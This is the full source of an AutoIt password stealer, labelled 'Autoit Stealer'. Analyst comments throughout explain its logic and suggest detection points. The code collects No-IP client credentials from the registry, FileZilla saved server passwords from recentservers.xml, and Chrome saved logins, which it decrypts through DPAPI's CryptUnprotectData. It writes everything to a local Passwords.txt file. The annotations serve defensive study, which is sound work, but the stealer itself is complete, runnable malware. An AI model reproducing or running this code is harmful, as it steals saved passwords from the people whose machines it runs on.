#comments-start
++++++++++++ Autoit Stealer
+++++++++ Write by; njq8
#comments-end
#include <SQLite.au3>
#include <SQLite.dll.au3>
; Top-level driver: calls the three collectors (noip, chrome, FileZilla) and
; writes their concatenated text output to Passwords.txt in the script's own
; directory. No network transmission is visible in this listing; the only
; output shown is this local file.
; Analyst note: a plaintext Passwords.txt created beside an AutoIt executable
; is a host artifact worth hunting for, and every credential listed in a
; recovered copy should be treated as exposed and rotated.
$file=@ScriptDir &"\Passwords.txt"
; Any earlier output file is deleted first, so only the latest run remains on disk.
if FileExists($file) then FileDelete($file)
; FileOpen mode 1 opens the file for writing (append); -1 signals failure.
$file_handle= fileopen($file ,1)
if $file_handle<>-1 Then
; The collectors are invoked only when the output file could be opened.
FileWrite($file_handle,noip() & chrome() & FileZilla() )
FileFlush($file_handle)
FileClose($file_handle)
endif
; NOIP(): reads the "Username" and "Password" values stored under
; HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC and returns them as one text
; record (URL / USR / PWD lines separated by CRLF).
; Returns "" when the Username value is empty or cannot be read.
; Analyst note: the password value is passed through exactly as stored; the
; "(Base64)" label in the output is the author's description of the stored
; format and is not verified by this code. Auditing reads of this registry
; key by processes other than the legitimate client is a detection
; opportunity (presumably the No-IP update client owns the key; confirm on a
; reference host).
Func NOIP()
$USR=RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC","Username")
; RegRead yields "" on failure, so a missing key or value ends the collector here.
if $USR="" then return ""
$PWD=RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC","Password")
Return "URL: http://no-ip.com/" & @crlf & "USR: " & $usr & @CRLF & "PWD (Base64): " & $pwd & @crlf & @CRLF
EndFunc
; FileZilla(): reads %APPDATA%\FileZilla\recentservers.xml line by line and
; builds one text record (URL / USR / PWD) per saved server entry.
; Returns the accumulated records, or "" when the file is absent or cannot be
; opened.
; Parsing is purely textual: for a line containing one of the tags <Host>,
; <Port>, <User> or <Pass>, the value is the text between the first ">" and
; the first "</" on that line. The <Pass> text is emitted as found in the
; file, with no decoding step.
; Analyst note: the file is read with ordinary user-level file access, so any
; process running as the same user can do the same. Reads of
; recentservers.xml by a process other than FileZilla are a useful detection
; signal; not saving passwords in the client (or protecting them with a
; master password where the client version offers one) limits what the file
; exposes.
Func FileZilla()
Local $pwds,$h,$FN=EnvGet("appdata") &"\FileZilla\recentservers.xml"
if FileExists($fn)=false then return ""
; FileOpen mode 0 = read-only; -1 signals failure.
$h= Fileopen($fn,0)
if $h=-1 then return ""
; Per-entry state; the port defaults to 21 when an entry has no <Port> line.
$host=""
$port=21
$usr=""
$pass=""
While True
$line= FileReadLine($h)
; FileReadLine sets @error to -1 at end of file.
If @error = -1 Then ExitLoop
if StringInStr($line,"<Host>") Then
; A <Host> line is treated as the start of a new entry: the other fields are
; reset so values from the previous entry do not carry over.
$usr=""
$pass=""
$port=21
$host= StringMid($line,1,StringInStr($line,"</")-1)
$host= StringMid($host,StringInStr($host,">")+1)
EndIf
if StringInStr($line,"<Port>") Then
$port= StringMid($line,1,StringInStr($line,"</")-1)
$port= StringMid($port,StringInStr($port,">")+1)
EndIf
if StringInStr($line,"<User>") Then
$usr= StringMid($line,1,StringInStr($line,"</")-1)
$usr= StringMid($usr,StringInStr($usr,">")+1)
EndIf
if StringInStr($line,"<Pass>") Then
$pass= StringMid($line,1,StringInStr($line,"</")-1)
$pass= StringMid($pass,StringInStr($pass,">")+1)
EndIf
; The closing </Server> tag flushes the fields collected so far as one record.
if StringInStr($line,"</Server>") Then
$pwds = $pwds & "URL: ftp://" & $host &":" & $port & @CRLF & "USR: " & $usr & @CRLF & "PWD: " & $pass & @crlf & @CRLF
EndIf
WEnd
Return $pwds
EndFunc
; Chrome(): opens the SQLite database at
; %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data, selects every row
; of the "logins" table and builds one text record (URL / USR / PWD) per row.
; Returns the accumulated records, or "" when the file does not exist.
; Columns are addressed by position: index 0 is labelled URL, index 3 USR, and
; index 5 is passed to UncryptRDPPassword() before being labelled PWD. The
; mapping therefore depends on the table's column order (not verified here).
; Only the "Default" profile path is touched by this listing.
; Analyst note: the behavioural signature is a non-browser process opening
; "Login Data" and then calling CryptUnprotectData in the same user session.
; File-access auditing or EDR rules on that path for processes other than the
; browser cover this collector.
Func Chrome()
Local $Q, $R, $PWDS,$fn=EnvGet("localappdata") & "\Google\Chrome\User Data\Default\Login Data"
if FileExists($fn)=False then return ""
; Loads the SQLite library through the SQLite.au3 UDF and opens the database file.
_SQLite_Startup()
_SQLite_Open($fn)
; -1 selects the most recently opened database handle.
_SQLite_Query(-1, "SELECT * FROM logins;", $Q)
; _SQLite_FetchData returns 0 ($SQLITE_OK) while rows remain.
While _SQLite_FetchData($Q, $r) = 0
$pwds = $pwds & "URL: "& $r[0] & @CRLF &"USR: "& $r[3] & @crlf &"PWD: "& UncryptRDPPassword( $r[5]) & @CRLF & @CRLF
WEnd
_SQLite_Close()
_SQLite_Shutdown()
Return $pwds
EndFunc
; UncryptRDPPassword($bin): passes a binary blob to crypt32.dll's
; CryptUnprotectData (Windows DPAPI) and returns the result decoded as a
; UTF-8 string (BinaryToString flag 4). Returns "" when the DllCall itself
; raises @error.
; The input is copied into a fixed 1024-byte buffer and described by an
; "int;ptr" structure (length, pointer) used as the input DATA_BLOB; a second
; zero-initialised structure receives the output blob. The four "ptr", 0
; arguments between the input blob and the flags are left null, so no
; optional entropy is supplied. $CRYPTPROTECT_UI_FORBIDDEN (0x1) is passed as
; the flags value.
; Despite the name, the only caller in this listing is Chrome(), which passes
; column 5 of each "logins" row.
; Analyst note: DPAPI data protected without additional entropy can be
; unprotected by code running as the same Windows user, which is why no
; elevation or key material appears in this listing. Secrets protected only
; this way should be treated as readable by any process in that user's
; session, and CryptUnprotectData calls from unexpected processes are a
; detection point.
Func UncryptRDPPassword($bin)
;This Func From >> http://www.autoitscript.com/forum/topic/96783-dllcall-for-cryptunprotectdata/#entry695769
Local Const $CRYPTPROTECT_UI_FORBIDDEN = 0x1
Local Const $DATA_BLOB = "int;ptr"
Local $passStr = DllStructCreate("byte[1024]")
Local $DataIn = DllStructCreate($DATA_BLOB)
Local $DataOut = DllStructCreate($DATA_BLOB)
; $pwDescription is assigned but not referenced again in this function.
$pwDescription = 'psw'
$PwdHash = ""
; Output blob starts as length 0 / null pointer; the API call fills it in.
DllStructSetData($DataOut, 1, 0)
DllStructSetData($DataOut, 2, 0)
; Input blob: copy the bytes into the buffer, then record its pointer and length.
DllStructSetData($passStr, 1, $bin)
DllStructSetData($DataIn, 2, DllStructGetPtr($passStr, 1))
DllStructSetData($DataIn, 1, BinaryLen($bin))
$return = DllCall("crypt32.dll","int", "CryptUnprotectData", _
"ptr", DllStructGetPtr($DataIn), _
"ptr", 0, _
"ptr", 0, _
"ptr", 0, _
"ptr", 0, _
"dword", $CRYPTPROTECT_UI_FORBIDDEN, _
"ptr", DllStructGetPtr($DataOut))
; Only a DllCall-level error is checked here; $return is not inspected afterwards.
If @error Then Return ""
; Re-map the output blob (length + pointer) as a byte array and decode it.
$len = DllStructGetData($DataOut, 1)
$PwdHash = Ptr(DllStructGetData($DataOut, 2))
$PwdHash = DllStructCreate("byte[" & $len & "]", $PwdHash)
Return BinaryToString(DllStructGetData($PwdHash, 1), 4)
EndFunc